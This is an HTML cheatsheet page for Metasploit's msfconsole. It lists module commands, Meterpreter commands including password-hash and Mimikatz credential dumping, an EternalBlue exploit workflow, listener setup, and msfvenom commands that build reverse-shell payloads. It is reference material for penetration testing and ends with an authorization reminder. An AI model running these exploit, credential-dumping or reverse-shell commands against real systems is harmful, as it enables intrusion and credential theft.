380 lines
11 KiB
HTML
380 lines
11 KiB
HTML
<!DOCTYPE html>
|
|
<html lang="en">
|
|
<head>
|
|
<meta charset="UTF-8">
|
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'; style-src 'self'; font-src 'self' data:; img-src 'self' data:; connect-src 'self'; base-uri 'self'; form-action 'self' https://defcon.social https://bsky.app;">
|
|
<meta http-equiv="X-Content-Type-Options" content="nosniff">
|
|
<link rel="stylesheet" href="../assets/css/style.css">
|
|
<link rel="icon" type="image/x-icon" href="../favicon.ico">
|
|
<script>
|
|
// Apply theme immediately to prevent flash
|
|
(function() {
|
|
const theme = localStorage.getItem('theme') ||
|
|
(window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light');
|
|
document.documentElement.setAttribute('data-theme', theme);
|
|
})();
|
|
</script>
|
|
<title>msfconsole Cheatsheet - Cheatsheets - Launch Pad</title>
|
|
</head>
|
|
<body>
|
|
<button class="theme-toggle" id="themeToggle" aria-label="Toggle dark mode">
|
|
<svg class="theme-icon theme-icon-moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path></svg>
|
|
<svg class="theme-icon theme-icon-sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" style="display: none;"><circle cx="12" cy="12" r="5"></circle><line x1="12" y1="1" x2="12" y2="3"></line><line x1="12" y1="21" x2="12" y2="23"></line><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line><line x1="1" y1="12" x2="3" y2="12"></line><line x1="21" y1="12" x2="23" y2="12"></line><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line></svg>
|
|
</button>
|
|
<br/><br/>
|
|
<div class="name">
|
|
__ _______________________ _________._________________________
|
|
\_ _____/ \______ \ / _ \ / _____/ / _____/ | | \_ _____/
|
|
| __) | _/ / /_\ \ / \ ___ / \ ___ | | | __)_
|
|
| \ | | \ / | \ \ \_\ \ \ \_\ \ | |___ | \
|
|
\___ / |____|_ / \____|__ / \______ / \______ / |_______ \ /_______ /
|
|
\/ \/ \/ \/ \/ \/ \/
|
|
</div>
|
|
<div class="blog-page-header">
|
|
<div class="blog-header-content">
|
|
<a href="/cheatsheets" class="back-link" title="Back to Cheatsheets">
|
|
<svg xmlns="http://www.w3.org/2000/svg" width="42" height="42" viewBox="0 0 24 24" class="home-icon"><path fill="currentColor" d="M10 20v-6h4v6h5v-8h3L12 3 2 12h3v8z"/></svg>
|
|
</a>
|
|
<h1 class="blog-page-title">msfconsole Cheatsheet</h1>
|
|
</div>
|
|
</div>
|
|
<div class="blog-post-container">
|
|
<div class="blog-posts-container" style="max-width: 900px; margin: 0 auto;">
|
|
<div class="blog-post">
|
|
<div class="blog-post-content">
|
|
<p><a href="index.html">← Back to cheatsheets</a></p>
|
|
<p><a href="../index.html">← Home</a></p>
|
|
<hr>
|
|
<p>msfconsole is the primary interface to the Metasploit Framework - the world's most used penetration testing tool. It provides exploit development, payload generation, post-exploitation, and much more.</p>
|
|
<hr>
|
|
<h2>Starting Metasploit</h2>
|
|
<ul>
|
|
<li>msfconsole - Start console</li>
|
|
</ul>
|
|
<ul>
|
|
<li>msfconsole -q - Quiet mode (no banner)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>msfconsole -r script.rc - Run resource script</li>
|
|
</ul>
|
|
<ul>
|
|
<li>msfconsole -x "commands" - Execute commands</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Core Commands</h2>
|
|
<ul>
|
|
<li>help - Show help</li>
|
|
</ul>
|
|
<ul>
|
|
<li>search <term> - Search modules</li>
|
|
</ul>
|
|
<ul>
|
|
<li>use <module> - Select module</li>
|
|
</ul>
|
|
<ul>
|
|
<li>info - Module information</li>
|
|
</ul>
|
|
<ul>
|
|
<li>show options - Show required options</li>
|
|
</ul>
|
|
<ul>
|
|
<li>show advanced - Show advanced options</li>
|
|
</ul>
|
|
<ul>
|
|
<li>set <option> <value> - Set option</li>
|
|
</ul>
|
|
<ul>
|
|
<li>setg <option> <value> - Set global option</li>
|
|
</ul>
|
|
<ul>
|
|
<li>unset <option> - Clear option</li>
|
|
</ul>
|
|
<ul>
|
|
<li>run / exploit - Execute module</li>
|
|
</ul>
|
|
<ul>
|
|
<li>back - Exit current module</li>
|
|
</ul>
|
|
<ul>
|
|
<li>exit - Quit msfconsole</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Search Syntax</h2>
|
|
<ul>
|
|
<li>search <term> - Basic search</li>
|
|
</ul>
|
|
<ul>
|
|
<li>search type:exploit <term> - By type</li>
|
|
</ul>
|
|
<ul>
|
|
<li>search platform:windows - By platform</li>
|
|
</ul>
|
|
<ul>
|
|
<li>search name:smb - By name</li>
|
|
</ul>
|
|
<ul>
|
|
<li>search cve:2021 - By CVE year</li>
|
|
</ul>
|
|
<ul>
|
|
<li>search author:hdm - By author</li>
|
|
</ul>
|
|
<ul>
|
|
<li>search rank:excellent - By rank</li>
|
|
</ul>
|
|
<h3>Module Types</h3>
|
|
<ul>
|
|
<li>exploit - Exploitation modules</li>
|
|
<li>auxiliary - Scanning, fuzzing, etc.</li>
|
|
<li>post - Post-exploitation</li>
|
|
<li>payload - Payloads (shellcode)</li>
|
|
<li>encoder - Payload encoders</li>
|
|
<li>nop - NOP generators</li>
|
|
<li>evasion - Evasion modules</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Module Commands</h2>
|
|
<ul>
|
|
<li>show exploits - List exploits</li>
|
|
</ul>
|
|
<ul>
|
|
<li>show auxiliary - List auxiliary</li>
|
|
</ul>
|
|
<ul>
|
|
<li>show payloads - List payloads (context-aware)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>show encoders - List encoders</li>
|
|
</ul>
|
|
<ul>
|
|
<li>show targets - Show exploit targets</li>
|
|
</ul>
|
|
<ul>
|
|
<li>show options - Current module options</li>
|
|
</ul>
|
|
<ul>
|
|
<li>check - Check if target is vulnerable</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Payload Options</h2>
|
|
<ul>
|
|
<li>set PAYLOAD <payload> - Set payload</li>
|
|
</ul>
|
|
<ul>
|
|
<li>set LHOST <ip> - Local host (listener)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>set LPORT <port> - Local port (listener)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>set RHOST <ip> - Remote host (target)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>set RHOSTS <ip/range> - Remote hosts</li>
|
|
</ul>
|
|
<ul>
|
|
<li>set RPORT <port> - Remote port</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Common Payloads</h2>
|
|
<h3>Windows</h3>
|
|
<ul>
|
|
<li>windows/meterpreter/reverse_tcp</li>
|
|
<li>windows/meterpreter/reverse_https</li>
|
|
<li>windows/shell/reverse_tcp</li>
|
|
<li>windows/x64/meterpreter/reverse_tcp</li>
|
|
</ul>
|
|
<h3>Linux</h3>
|
|
<ul>
|
|
<li>linux/x86/meterpreter/reverse_tcp</li>
|
|
<li>linux/x64/meterpreter/reverse_tcp</li>
|
|
<li>linux/x86/shell/reverse_tcp</li>
|
|
</ul>
|
|
<h3>Multi-platform</h3>
|
|
<ul>
|
|
<li>multi/handler - Catch incoming connections</li>
|
|
<li>generic/shell_reverse_tcp</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Session Management</h2>
|
|
<ul>
|
|
<li>sessions - List active sessions</li>
|
|
</ul>
|
|
<ul>
|
|
<li>sessions -i <id> - Interact with session</li>
|
|
</ul>
|
|
<ul>
|
|
<li>sessions -k <id> - Kill session</li>
|
|
</ul>
|
|
<ul>
|
|
<li>sessions -K - Kill all sessions</li>
|
|
</ul>
|
|
<ul>
|
|
<li>sessions -u <id> - Upgrade to meterpreter</li>
|
|
</ul>
|
|
<ul>
|
|
<li>background / bg - Background session</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Meterpreter Commands</h2>
|
|
<h3>Core</h3>
|
|
<ul>
|
|
<li>help - Show commands</li>
|
|
<li>background - Background session</li>
|
|
<li>exit - Terminate session</li>
|
|
<li>sysinfo - System information</li>
|
|
<li>getuid - Current user</li>
|
|
<li>getpid - Process ID</li>
|
|
</ul>
|
|
<h3>File System</h3>
|
|
<ul>
|
|
<li>pwd - Print working directory</li>
|
|
<li>cd - Change directory</li>
|
|
<li>ls - List files</li>
|
|
<li>cat - Display file</li>
|
|
<li>download file - Download file</li>
|
|
<li>upload file - Upload file</li>
|
|
<li>rm file - Remove file</li>
|
|
<li>mkdir dir - Create directory</li>
|
|
<li>search -f pattern - Search files</li>
|
|
</ul>
|
|
<h3>Process</h3>
|
|
<ul>
|
|
<li>ps - List processes</li>
|
|
<li>migrate <pid> - Migrate to process</li>
|
|
<li>kill <pid> - Kill process</li>
|
|
<li>execute -f cmd - Execute command</li>
|
|
</ul>
|
|
<h3>Network</h3>
|
|
<ul>
|
|
<li>ipconfig / ifconfig - Network info</li>
|
|
<li>netstat - Network connections</li>
|
|
<li>portfwd - Port forwarding</li>
|
|
<li>route - Routing table</li>
|
|
</ul>
|
|
<h3>Privilege Escalation</h3>
|
|
<ul>
|
|
<li>getsystem - Attempt SYSTEM</li>
|
|
<li>hashdump - Dump password hashes</li>
|
|
<li>load kiwi - Load Mimikatz</li>
|
|
<li>creds_all - All credentials (kiwi)</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Database Commands</h2>
|
|
<ul>
|
|
<li>db_status - Database status</li>
|
|
</ul>
|
|
<ul>
|
|
<li>workspace - Manage workspaces</li>
|
|
</ul>
|
|
<ul>
|
|
<li>hosts - List hosts in DB</li>
|
|
</ul>
|
|
<ul>
|
|
<li>services - List services</li>
|
|
</ul>
|
|
<ul>
|
|
<li>vulns - List vulnerabilities</li>
|
|
</ul>
|
|
<ul>
|
|
<li>creds - List credentials</li>
|
|
</ul>
|
|
<ul>
|
|
<li>loot - List loot</li>
|
|
</ul>
|
|
<ul>
|
|
<li>db_nmap - Run nmap, save to DB</li>
|
|
</ul>
|
|
<ul>
|
|
<li>db_import file - Import scan results</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Common Workflows</h2>
|
|
<h3>Exploit Workflow</h3>
|
|
<pre><code>search eternalblue
|
|
use exploit/windows/smb/ms17_010_eternalblue
|
|
show options
|
|
set RHOSTS 192.168.1.100
|
|
set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
|
set LHOST 192.168.1.50
|
|
exploit</code></pre>
|
|
<h3>Handler Setup</h3>
|
|
<pre><code>use exploit/multi/handler
|
|
set PAYLOAD windows/meterpreter/reverse_tcp
|
|
set LHOST 0.0.0.0
|
|
set LPORT 4444
|
|
exploit -j</code></pre>
|
|
<h3>Port Scan</h3>
|
|
<pre><code>use auxiliary/scanner/portscan/tcp
|
|
set RHOSTS 192.168.1.0/24
|
|
set PORTS 22,80,443,445
|
|
run</code></pre>
|
|
<h3>SMB Enumeration</h3>
|
|
<pre><code>use auxiliary/scanner/smb/smb_version
|
|
set RHOSTS 192.168.1.0/24
|
|
run</code></pre>
|
|
<hr>
|
|
<h2>Payload Generation (msfvenom)</h2>
|
|
<pre><code># Windows reverse shell
|
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe
|
|
|
|
# Linux reverse shell
|
|
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf > shell.elf
|
|
|
|
# PHP reverse shell
|
|
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw > shell.php
|
|
|
|
# Python reverse shell
|
|
msfvenom -p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw
|
|
|
|
# List formats
|
|
msfvenom --list formats</code></pre>
|
|
<hr>
|
|
<h2>Resource Scripts</h2>
|
|
<p>Create .rc files to automate tasks:</p>
|
|
<pre><code># handler.rc
|
|
use exploit/multi/handler
|
|
set PAYLOAD windows/meterpreter/reverse_tcp
|
|
set LHOST 0.0.0.0
|
|
set LPORT 4444
|
|
set ExitOnSession false
|
|
exploit -j</code></pre>
|
|
<p>Run with: msfconsole -r handler.rc</p>
|
|
<hr>
|
|
<h2>Tips</h2>
|
|
<ul>
|
|
<li>Always run db_status to ensure database is connected</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Use workspaces to organize different engagements</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Use -j with exploit to run as job (background)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Check if target is vulnerable before exploiting</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Use staged payloads for smaller initial size</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Use HTTPS payloads to bypass firewalls</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Update regularly: msfupdate</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Only use with proper authorization</li>
|
|
</ul>
|
|
<hr>
|
|
<p><a href="index.html">← Back to cheatsheets</a></p>
|
|
<p><a href="../index.html">← Home</a></p>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
<script async type="text/javascript" src="../blog/analytics.js"></script>
|
|
<script src="../theme.js"></script>
|
|
</body>
|
|
</html>
|